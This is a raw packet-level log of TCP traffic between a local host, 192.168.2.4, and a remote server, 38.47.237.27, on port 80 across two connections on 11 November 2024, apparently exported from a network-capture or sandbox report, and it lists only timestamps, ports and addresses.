Nov 11, 2024 08:33:40.749520063 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749603987 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749608994 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749727964 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749733925 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749768019 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.749845028 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749850035 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.749984980 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.750034094 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.750068903 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.750205994 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.750315905 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.754585981 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.754641056 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.754951954 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.754957914 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.755065918 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.804586887 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.804598093 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.809267044 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.830960989 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.830976963 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.830992937 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831003904 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831012964 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831024885 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831135988 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.831135988 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.831536055 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831571102 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831582069 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831630945 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.831962109 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831974030 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.831984043 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832036018 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832043886 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.832043886 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.832047939 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832787037 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832832098 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832843065 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832856894 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.832885027 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.832895994 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.833008051 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.833650112 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.833724976 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.836852074 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.875547886 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.875564098 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.875575066 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.875705004 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.886117935 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.886130095 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.886141062 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.886301041 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.912143946 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912163019 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912173986 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912275076 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.912306070 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912321091 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912332058 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912405968 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912416935 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912425995 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.912426949 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912440062 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.912489891 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.913233042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913244009 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913254023 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913269997 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913280964 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913356066 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.913356066 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.913780928 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913826942 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913836956 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913912058 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913923025 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913933039 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913933992 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.913947105 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.913980961 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.914721966 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914732933 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914745092 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914813042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914824009 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914829016 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.914835930 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914849043 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.914932966 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.915620089 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915632963 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915642977 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915709972 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915720940 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915730953 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915744066 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.915880919 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.916507959 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.916520119 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.916528940 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.917256117 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.956623077 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956633091 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956644058 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956716061 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956727982 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956738949 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.956744909 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.956969976 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.967217922 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967227936 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967238903 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967281103 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967292070 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967307091 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.967308998 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.967320919 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.967358112 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.993387938 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993411064 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993422031 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993457079 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993485928 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993535042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993545055 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993555069 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993556976 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.993683100 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993695021 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993704081 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993716955 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993726969 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993737936 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993742943 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.993752003 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.993773937 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.993838072 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.994482994 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994496107 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994504929 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994518042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994528055 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994592905 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.994592905 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.994786024 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994796991 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994807005 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994873047 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994882107 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.994885921 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.994939089 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.995174885 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995227098 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995238066 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995309114 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995318890 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.995326042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995345116 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995356083 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995390892 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.995420933 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995433092 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995441914 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995449066 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.995459080 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.995484114 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.995511055 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.996156931 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996169090 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996180058 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996241093 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.996248960 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996260881 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996269941 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996283054 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996303082 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.996365070 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996367931 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.996377945 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996387959 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996398926 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.996499062 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.997059107 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997106075 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997117043 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997163057 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.997165918 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997178078 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997186899 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997253895 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.997268915 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997281075 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997292042 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997303009 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.997387886 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:41.740792990 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:42.758824110 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:42.766190052 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:42.769298077 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:42.785239935 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:42.792658091 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.291893959 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.291917086 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.291927099 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.291959047 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.291974068 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292011023 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292018890 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.292093992 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292129040 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.292155027 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292258024 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292293072 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.292294025 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292431116 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.292471886 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.297154903 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.297168970 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.297209024 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.297210932 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.297278881 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.297316074 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.347261906 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.347268105 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.347335100 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.373393059 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.373456001 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.373466015 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.373476028 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.373497963 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.373533010 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.378360987 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.378371954 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.378406048 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.378407955 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.378417969 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.378454924 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.383472919 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.383485079 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.383495092 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.383517027 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.383527994 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.383527994 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.383555889 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.388900042 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388912916 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388922930 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388938904 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.388945103 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388955116 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388964891 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.388977051 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.389003992 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.395082951 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.395095110 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.395138025 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.415365934 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.415378094 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.415389061 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.415406942 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.415438890 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.428376913 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.428406000 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.428417921 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.428443909 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.454447031 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.454457998 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.454468966 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.454492092 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.454508066 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.454581976 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.459165096 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.459177017 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.459207058 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.463879108 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.463896990 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.463907003 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.463916063 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.463924885 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.463927984 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.463943958 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.463970900 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.468655109 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.468667984 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.468678951 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.468689919 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.468702078 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.468719959 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.468749046 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.473417044 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.473439932 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.473457098 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.473469019 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.473485947 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.473496914 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.478249073 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.478262901 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.478274107 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.478291035 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.478302956 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.478306055 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.478315115 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.478348970 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.482963085 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.482986927 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.483000994 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.483011007 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.483035088 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.483048916 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.487715960 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.487734079 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.487745047 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.487763882 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.487765074 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.487812042 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.493613005 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.493627071 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.493637085 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.493648052 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.493659973 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.493660927 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.493688107 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.498528957 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498541117 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498553991 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498564959 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498567104 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.498575926 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498589039 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.498591900 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.498614073 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.509490013 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.509495974 CET	80	50040	38.47.237.27	192.168.2.4
